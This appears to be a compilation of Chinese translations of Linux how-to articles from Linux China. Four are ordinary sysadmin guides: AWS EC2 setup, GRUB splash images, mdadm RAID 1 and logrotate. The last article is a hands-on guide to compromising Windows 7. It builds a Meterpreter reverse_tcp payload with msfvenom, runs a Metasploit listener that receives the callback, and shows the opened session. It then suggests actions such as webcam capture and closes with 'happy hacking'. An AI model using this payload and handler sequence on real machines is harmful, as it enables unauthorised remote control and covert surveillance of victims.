AWS（Amazon Web Services）是全球领先的云服务器提供商之一。你可以使用 AWS 平台在一分钟内设置完服务器。在 AWS 上，你可以微调服务器的许多技术细节，如 CPU 数量，内存和磁盘空间，磁盘类型（更快的 SSD 或者经典的 IDE）等。关于 AWS 最好的一点是，你只需要为你使用到的服务付费。在开始之前，AWS 提供了一个名为 “Free Tier” 的特殊帐户，你可以免费使用一年的 AWS 技术服务，但会有一些小限制，例如，你每个月使用服务器时长不能超过 750 小时，超过这个他们就会向你收费。你可以在 aws 官网上查看所有相关的规则。

因为我的这篇文章是关于在 AWS 上创建 Linux 服务器，因此拥有 “Free Tier” 帐户是先决条件。要注册帐户，你可以使用此链接。请注意，你需要在创建帐户时输入信用卡详细信息。

让我们假设你已经创建了 “Free Tier” 帐户。

在继续之前，你必须了解 AWS 中的一些术语以了解设置：

1. EC2（弹性计算云）：此术语用于虚拟机。
2. AMI（Amazon 机器镜像）：表示操作系统实例。
3. EBS（弹性块存储）：AWS 中的一种存储环境类型。

通过以下链接登录 AWS 控制台：https://console.aws.amazon.com/ 。

AWS 控制台将如下所示：

在 AWS 中设置 Linux VM

1、 创建一个 EC2（虚拟机）实例：在开始安装系统之前，你必须在 AWS 中创建一台虚拟机。要创建虚拟机，在“ 计算 compute ”菜单下点击 EC2：

2、 现在在 创建实例 Create instance 下点击 “启动实例” Launch Instance 按钮。

3、 现在，当你使用的是一个 “Free Tier” 帐号，接着最好选择 “Free Tier” 单选按钮以便 AWS 可以过滤出可以免费使用的实例。这可以让你不用为使用 AWS 的资源而付费。

4、 要继续操作，请选择以下选项：

a、 在经典实例向导中选择一个 AMI（Amazon Machine Image），然后选择使用 Red Hat Enterprise Linux 7.2（HVM），SSD 存储

b、 选择 “t2.micro” 作为实例详细信息。

c、 配置实例详细信息：不要更改任何内容，只需单击下一步。

d、 添加存储：不要更改任何内容，只需点击下一步，因为此时我们将使用默认的 10（GiB）硬盘。

e、 添加标签：不要更改任何内容只需点击下一步。

f、 配置安全组：现在选择用于 ssh 的 22 端口，以便你可以在任何地方访问此服务器。

g、 选择“ 查看并启动 Review and Launch ”按钮。

h、 如果所有的详情都无误，点击 “ 启动 Launch ”按钮。

i、 单击“ 启动 Launch ”按钮后，系统会像下面那样弹出一个窗口以创建“密钥对”：选择选项“ 创建密钥对 create a new key pair ”，并给密钥对起个名字，然后下载下来。在使用 ssh 连接到服务器时，需要此密钥对。最后，单击“ 启动实例 Launch Instance ”按钮。

j、 点击“ 启动实例 Launch Instance ”按钮后，转到左上角的服务。选择“ 计算 compute ”--> “EC2”。现在点击“ 运行实例 Running Instances ”：

k、 现在你可以看到，你的新 VM 的状态是 “ 运行中 running ”。选择实例，请记下登录到服务器所需的 “ 公开 DNS 名称 Public DNS ”。

现在你已完成创建一台运行 Linux 的 VM。要连接到服务器，请按照以下步骤操作。

从 Windows 中连接到 EC2 实例

1、 首先，你需要有 putty gen 和 Putty exe 用于从 Windows 连接到服务器（或 Linux 上的 SSH 命令）。你可以通过下面的链接下载 putty。

2、 现在打开 putty gen ：puttygen.exe。

3、 你需要单击 “Load” 按钮，浏览并选择你从亚马逊上面下载的密钥对文件（pem 文件）。

4、 你需要选择 “ssh2-RSA” 选项，然后单击保存私钥按钮。请在下一个弹出窗口中选择 “yes”。

5、 将文件以扩展名 .ppk 保存。

6、 现在你需要打开 putty.exe。在左侧菜单中点击 “connect”，然后选择 “SSH”，然后选择 “Auth”。你需要单击浏览按钮来选择我们在步骤 4 中创建的 .ppk 文件。

7、 现在点击 “session” 菜单，并在“host name” 中粘贴在本教程中 “k” 步骤中的 DNS 值，然后点击 “open” 按钮。

8、 在要求用户名和密码时，输入 ec2-user 和空白密码，然后输入下面的命令。

$ sudo su - 

哈哈，你现在是在 AWS 云上托管的 Linux 服务器上的主人啦。

via: https://www.howtoforge.com/tutorial/how-to-setup-linux-server-with-aws/

作者：MANMOHAN MIRKAR 译者：geekpi 校对：jasminepeng

本文由 LCTT 原创编译，Linux中国 荣誉推出

何为 GRUB 背景（ Splash ）？

GRUB 背景（ Splash ）只不过是一张图像，在 Linux 系统启动的时候显示为背景。你可能知道 Grub (GRand Unified Bootloader 的简写) 是主流 Linux 发行版中广泛使用的 启动装载程序 （ bootloader ） 。以 RedHat 为例，你会发现它在系统启动之时显示为空白或者是一个黑色背景。

GRUB 背景（ Splash ）的相关定义在 grub.conf 文件中，并且 splash 背景图像应该存储在 /boot 分区中。如果你觉得默认的空白屏相当无趣，同时又想按照自己的意愿来修改它，那么赶紧阅读下方的每个步骤吧。

开始前需要哪些准备工作

1. ImageMagick (仅在命令行中使用) 或者 GIMP (GUI 中使用)
2. 一个样例图像

使用 GUI 修改 Grub 的 Splash 背景

首先然我们来使用 GUI 来进行操作吧，这里我们使用 GIMP 来作为图像编辑器。

步骤 1、 使用 GIMP 打开图像 (路径为： 应用 （ Applications ） --> 图像 （ Graphics ） --> GIMP 程序 （ GNU Image Manipulation Program ） )

步骤 2、 现在我们需要按实际情况将图像缩放到 640x480 大小。为此，需要点击 图像 （ Image ） --> 缩放图像 （ Scale Image ） 。记住，要如下图参数进行设置。修改宽度为 640，高度为 480。其他保持不变。

点击 缩放 （ Scale ） 按钮

步骤 3、 然后，我们需要索引图像，让它仅使用 14 色。为此，点击 图像 （ Image ） --> 模式 （ Mode ） --> 索引 （ Indexed ） 。点选 生成最优调色板 （ generate optimum palette ） 选项，并设置 颜色最大值 （ maximum number of colors ） 为 14 (如下)。

点击 转换 （ convert ） 按钮

步骤 4、 保存文件。这里以文件名为 “UxTechno.xpm” 来保存。

步骤 5、 以 Zip 方式压缩文件。为此，转到文件的保存位置 --> 右击并选择 压缩 （ Compress ） 选项，选择 gzip 方法来压缩。

步骤 6、 现在复制或移动 "UxTechno.xpm.gz" 到 /boot/grub/UxTechno.xpm.gz。

步骤 7、 这一步，打开 /boot/grub/grub.conf 文件编辑 splashimage 参数如下，并保存文件。

最后，文件的内容应该是像这样的：

# grub.conf
generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE: You have a /boot partition. This means
    that # all kernel and initrd paths are relative to /boot/, eg. # root
    (hd0,0) # kernel /vmlinuz-version ro root=/dev/sda2 # initrd
    /initrd-[generic-]version.img #boot=/dev/sda default=0 timeout=5
    splashimage=(hd0,0)/grub/UxTechno.xpm.gz
    hiddenmenu   
    title Red Hat Enterprise Linux (2.6.32-220.el6.x86_64)
    root (hd0,0)
    kernel /vmlinuz-2.6.32-220.el6.x86_64 ro root=UUID=1d8c5075-1a5b-4fdc-ba15-0458b65c6012 rd_NO_LUKS rd_NO_LVM LANG=en_US.UTF-8 rd_NO_MD quiet SYSFONT=latarcyrheb-sun16 rhgb
    crashkernel=auto KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM initrd
    /initramfs-2.6.32-220.el6.x86_64.img

当你重启服务器之后，你讲看到如下效果的 splash 背景图像：

使用命令行修改 Grub 的 Splash 背景

如果说你是命令行的超级粉丝，那就使用如下方法吧。

步骤 1、 开始之前，我们需要修改图像的像素分辨率。为此，我们还需要在 Linux 系统上安装好 ImageMagick。在 CentOS / RHEL 上使用如下命令来进行交叉检查。

# rpm -qa|grep -i ImageMagick

如果命令没有返回输出 (即空白)，这意味这你的系统上还没有安装 ImageMagick。你必须运行下面的命令来安装它。

# yum install ImageMagick

安装好了重新复核一下，你会得到类似如下的输出：

# rpm -qa|grep -i ImageMagick

ImageMagick-6.5.4.7-5.el6.x86_64

然后，继续接下来的配置。这里我使用 UxTechno 的 logo 来做 splash 背景图像。

步骤 2、 使用如下命令来转换像素深度。

# convert -depth 8 -colors 14 -resize 640x480 uxtechno_logo.jpg uxtechno_logo.xpm

上述选项的意义如下：

1. 最大使用 14 色
2. 分辨率为 640x480
3. 使用 xpm 格式

步骤 3、 以 Zip 方式压缩文件。

# gzip uxtechno_logo.xpm

步骤 4、 复制文件到 /boot 分区。

# cp uxtechno_logo.xpm.gz /boot/grub/

步骤 5、 在 /boot/grub/grub.conf 文件中修改 splashimage 参数如下，并保存文件。

splashimage=(hd0,0)/grub/uxtechno_logo.xpm

步骤 6、 最后，使用 reboot 命令重启服务器。启动界面将显示使用 GUI 方式第 7 步中的图像。

（题图原图在 wallconvert.com）

译者简介：

GHLandy —— 生活中所有欢乐与苦闷都应藏在心中，有些事儿注定无人知晓，自己也无从说起。

via: https://www.howtoforge.com/tutorial/how-to-change-the-linux-splash-screen/

作者：MANMOHAN MIRKAR 译者：GHLandy 校对：wxy

本文由 LCTT 原创编译，Linux中国 荣誉推出

设置 Linux RAID 1

配置 LINUX RAID 1 非常重要，因为它提供了冗余性。

RAID 分区拥有高级功能，如冗余和更好的性能。所以让我们来说下如何实现 RAID，以及让我们来看看不同类型的 RAID：

• RAID 0（条带）：磁盘组合在一起，形成一个更大的驱动器。这以可用性为代价提供了更好的性能。如果 RAID 中的任何一块磁盘出现故障，则整个磁盘集将无法使用。最少需要两块磁盘。
• RAID 1（镜像）：磁盘从一个复制到另一个，提供了冗余。如果一块磁盘发生故障，则另一块磁盘接管，它有另外一份原始磁盘的数据的完整副本。其缺点是写入时间慢。最少需要两块磁盘。
• RAID 5（带奇偶校验的条带）：磁盘类似于 RAID 0，并且连接在一起以形成一个大型驱动器。这里的区别是，一块磁盘用于奇偶校验位，这允许在单个磁盘发生故障时可以恢复磁盘。最少需要三块盘。

让我们继续进行 Linux RAID 1 配置。

安装 Linux RAID 1 的要求：

1、系统中应该安装了 mdam，请用下面的命令确认。

[root@rhel1 ~]# rpm -qa | grep -i mdadm
mdadm-3.2.2-9.el6.x86_64
[root@rhel1 ~]#

2、 系统应该连接了 2 块磁盘。

创建两个分区，一个磁盘一个分区（sdc、sdd），每个分区占据整块磁盘。

Disk /dev/sdc: 1073 MB, 1073741824 bytes
255 heads, 63 sectors/track, 130 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x67cc8cfb

Device Boot Start End Blocks Id System
/dev/sdc1 1 130 1044193+ 83 Linux

Disk /dev/sdd: 1073 MB, 1073741824 bytes
255 heads, 63 sectors/track, 130 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x0294382b

Device Boot Start End Blocks Id System
/dev/sdd1 1 130 1044193+ 83 Linux

现在你可以用你已经创建好的两个分区来设置 RAID 1 了。你可以使用 mdadm 命令来创建 RAID 阵列。

Syntax: mdadm [options] 
Options: -a, xx Adds a disk into a current array 
-C, —create Creates a new RAID array 
-D, —detail Prints the details of an array 
-G, —grow Changes the size or shape of an active array
-f, xx Fails a disk in the array
-l, —level Specifies level (type) of RAID array to create 
-n, —raid-devices Specifies the devices in the RAID array 
-q, —quiet Species not to show output 
-S, —stop Stops an array 
-v, —verbose Provides verbose output

创建 Linux RAID 1 设备：

[root@rhel1 ~]# mdadm -Cv /dev/md0 --level=1 -n2 /dev/sdc1 /dev/sdd1
mdadm: Note: this array has metadata at the start and
may not be suitable as a boot device. If you plan to
store '/boot' on this device please ensure that
your boot-loader understands md/v1.x metadata, or use
--metadata=0.90
mdadm: size set to 1044181K
Continue creating array? y
mdadm: Defaulting to version 1.2 metadata
mdadm: array /dev/md0 started.
[root@rhel1 ~]#

使用下列命令查看新创建的 RAID 1 设备：

[root@rhel1 ~]# cat /proc/mdstat
Personalities : [raid1]
md0 : active raid1 sdd1[1] sdc1[0]
1044181 blocks super 1.2 [2/2] [UU]
 
unused devices: <none>
[root@rhel1 ~]# cat /proc/mdstat
Personalities : [raid1]
md0 : active raid1 sdd1[1] sdc1[0]
1044181 blocks super 1.2 [2/2] [UU]
 
unused devices: <none>

使用 mdadm 命令再次确认，RAID 1 已经创建好了。

[root@rhel1 ~]# mdadm -D /dev/md0
/dev/md0:
Version : 1.2
Creation Time : Wed Dec 7 15:50:06 2016
Raid Level : raid1
Array Size : 1044181 (1019.88 MiB 1069.24 MB)
Used Dev Size : 1044181 (1019.88 MiB 1069.24 MB)
Raid Devices : 2
Total Devices : 2
Persistence : Superblock is persistent
 
Update Time : Wed Dec 7 15:50:12 2016
State : clean
Active Devices : 2
Working Devices : 2
Failed Devices : 0
Spare Devices : 0
 
Name : rhel1.lab.com:0 (local to host rhel1.lab.com)
UUID : d5c0f82e:4e0753e6:0b28c178:e6f75af4
Events : 17
 
Number Major Minor RaidDevice State
0 8 33 0 active sync /dev/sdc1
1 8 49 1 active sync /dev/sdd1
[root@rhel1 ~]#

使用下列命令格式化新创建的 Linux RAID 1 设备：

[root@rhel1 ~]# mkfs.ext4 /dev/md0
mke2fs 1.41.12 (17-May-2010)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
65280 inodes, 261045 blocks
13052 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=268435456
8 block groups
32768 blocks per group, 32768 fragments per group
8160 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376
 
Writing inode tables: done
Creating journal (4096 blocks): done
Writing superblocks and filesystem accounting information: done
 
This filesystem will be automatically checked every 23 mounts or
180 days, whichever comes first. Use tune2fs -c or -i to override.

挂载 Linux RAID 1 设备：

[root@rhel1 ~]# mkdir /RAID1
[root@rhel1 ~]# mount /dev/md0 /RAID1
[root@rhel1 ~]# df -h /RAID1
Filesystem Size Used Avail Use% Mounted on
/dev/md0 1004M 18M 936M 2% /RAID1
[root@rhel1 ~]#

作者简介：

大家好！我是 Manmohan Mirkar。我很高兴见到你们！我在 10 多年前开始使用 Linux，我从来没有想过我会到今天这个地步。我的激情是帮助你们获取 Linux 知识。谢谢阅读！

via: http://www.linuxroutes.com/linux-raid-1/

作者：Manmohan Mirkar 译者：geekpi 校对：wxy

本文由 LCTT 原创编译，Linux中国 荣誉推出

一般来说，日志是任何故障排除过程中非常重要的一部分，但这些日志会随着时间增长。在这种情况下，我们需要手动执行日志清理以回收空间，这是一件繁琐的管理任务。为了解决这个问题，我们可以在 Linux 中配置 logrotate 程序，它可以自动执行日志文件的轮换、压缩、删除和用邮件发出。

我们可以配置 logrotate 程序，以便每个日志文件可以在每天、每周、每月或当它变得太大时处理。

logrotate 是如何工作的

默认情况下，logrotate 命令作为放在 /etc/cron.daily 中的 cron 任务，每天运行一次，它会帮助你设置一个策略，其中超过某个时间或大小的日志文件被轮换。

命令： /usr/sbin/logrotate

配置文件： /etc/logrotate.conf

这是 logrotate 的主配置文件。logrotate 还在 /etc/logrotate.d/ 中存储了特定服务的配置。确保下面的那行包含在 /etc/logrotate.conf 中，以读取特定服务日志配置。

include  /etc/logrotate.d`

logrotate 历史： /var/lib/logrotate.status

重要的 logrotate 选项：

compress             --> 压缩日志文件的所有非当前版本
daily,weekly,monthly --> 按指定计划轮换日志文件
delaycompress        --> 压缩所有版本，除了当前和下一个最近的
endscript            --> 标记 prerotate 或 postrotate 脚本的结束
errors "emailid"     --> 给指定邮箱发送错误通知
missingok            --> 如果日志文件丢失，不要显示错误
notifempty           --> 如果日志文件为空，则不轮换日志文件
olddir "dir"         --> 指定日志文件的旧版本放在 “dir” 中
postrotate           --> 引入一个在日志被轮换后执行的脚本
prerotate            --> 引入一个在日志被轮换前执行的脚本
rotate 'n'           --> 在轮换方案中包含日志的 n 个版本
sharedscripts        --> 对于整个日志组只运行一次脚本
size='logsize'       --> 在日志大小大于 logsize（例如 100K，4M）时轮换

配置

让我们为我们自己的示例日志文件 /tmp/sample_output.log 配置 logrotate。

第一步：在 /etc/logrotate.conf 中添加以下行。

/tmp/sample_output.log {
  size 1k
  create 700 root root
  rotate 4
  compress
}

在上面的配置文件中：

• size 1k - logrotate 仅在文件大小等于（或大于）此大小时运行。
• create - 轮换原始文件并创建具有指定权限、用户和组的新文件。
• rotate - 限制日志文件轮转的数量。因此，这将只保留最近的 4 个轮转的日志文件。
• compress - 这将压缩文件。

第二步：通常，你需要等待一天才能等到 logrotate 由 /etc/cron.daily 执行。除此之外，你可以用下面的命令在命令行中运行：

/usr/sbin/logrotate  /etc/logrotate.conf

在执行 logrotate 命令之前的输出：

[root@rhel1 tmp]# ls -l /tmp/
total 28
-rw-------. 1 root root 20000 Jan 1 05:23 sample_output.log

在执行 logrotate 之后的输出：

[root@rhel1 tmp]# ls -l /tmp
total 12
-rwx------. 1 root root 0 Jan 1 05:24 sample_output.log
-rw-------. 1 root root 599 Jan 1 05:24 sample_output.log-20170101.gz
[root@rhel1 tmp]#

这样就能确认 logrotate 成功实现了。

作者简介：

大家好！我是 Manmohan Mirkar。我很高兴见到你们！我在 10 多年前开始使用 Linux，我从来没有想过我会到今天这个地步。我的激情是帮助你们获取 Linux 知识。谢谢你们在这！

via: http://www.linuxroutes.com/configure-logrotate/

作者：Manmohan Mirkar 译者：geekpi 校对：wxy

本文由 LCTT 原创编译，Linux中国 荣誉推出

Kali Linux 派生自 Debian Linux，主要用于渗透测试，拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台，Metasploit 是一个用于开发和执行 安全利用代码 （ security exploit ） 的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意，我写这篇文章只是出于教育目的哦——一切因此带来的后果和本文作者、译者无关。

源机器详情

Kali Linux

root@kali:/# uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
root@kali:/#

用做攻击对象的目标机器：

Windows 7 Ultimate SP1

步骤 1：创建 Payload 程序

Payload 是一个类似于病毒或者木马的程序，可以运行在远程目标上 —— 为了黑掉那台机器。可以通过以下命令来创建 Payload（program.exe），以便能使用 Kali Linux 黑掉 Windows。

root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root@kali:/# ls -la /root/program.exe
-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

通过 ls 命令，我们可以确认 Payload 程序是否成功生成在指定的位置。

步骤 2：运行 mfsconsole 命令启动 msf 命令窗口

root@kali:# msfconsole


                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

步骤 3：进行漏洞利用的细节

• 4444 端口：你可以按照自己的想法来选择使用哪个端口
• LHOST IP：表示 Kali Linux 机器的 IP，这里是 192.168.189.128。 使用如下命令来查看你的 Kali Linux 机器的 IP。

root@kali:/# ip r l
192.168.189.0/24 dev eth0  proto kernel  scope link  src 192.168.189.128  metric 100
root@kali:/#

现在在 msf 命令窗口使用 use exploit/multi/handler 命令，如下：

msf > use exploit/multi/handler
msf exploit(handler) >

然后在接下来的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp：

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

现在使用 LHOST 和 LPORT 来设置本地 IP 和本地端口，如下：

msf exploit(handler) > set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit(handler) > set lport 4444
lport => 4444

最后使用 exploit 命令。

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...

现在你需要在 Windows 上运行 program.exe，一旦它在目标机器上执行，你就可以建立一个 meterpreter 会话。输入 sysinfo 就可以得到这台被黑掉的 Windows 机器的详情。

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000

meterpreter > sysinfo
Computer        : MANN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_IN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32

一旦你得到了这些详细信息，就可以做更多的漏洞利用，或者通过 help 命令获取更多信息，以便列出你可以黑掉该系统的所有选项，比如 webcam_snap 命令获取网络摄像头，同样你还可以使用其他更多的可用选项。祝你入侵愉快！！！！ ←\_←

作者简介：

嗨，我是 Manmohan Mirkar。很高兴认识你。我接触 Linux 是在十年前，我做梦也没想到我有现在这样的收获。我的愿望就是让你学到 Linux 的知识，谢谢你的阅读。

译者简介：

GHLandy —— 划不完粉腮柳眉泣别离。

via: http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/

作者：Manmohan Mirkar 译者：GHLandy 校对：wxy

本文由 LCTT 原创编译，Linux中国 荣誉推出